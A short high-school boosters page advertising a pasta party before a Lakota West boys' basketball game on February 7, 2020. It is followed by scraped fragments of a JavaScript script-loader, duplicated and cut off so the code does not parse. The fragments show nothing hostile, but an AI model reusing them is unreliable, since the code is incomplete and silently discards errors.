Boosters
Pasta Party Info this Friday before the Boys Basketball game!
Bring your appetite Firebird Nation to the Pasta Party, sponsored by the Lakota West Boosters. Start with a plate of pasta followed by a full evening of basketball as the boys take on Colerain high school this Friday. Pasta Party ticket ($10) good for entry on Friday, February 7, 2020 | Starts at 5:00 pm and ends at 7:30 pm.
BUY TICKETS ONLINE: lakotawestboosters.com
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();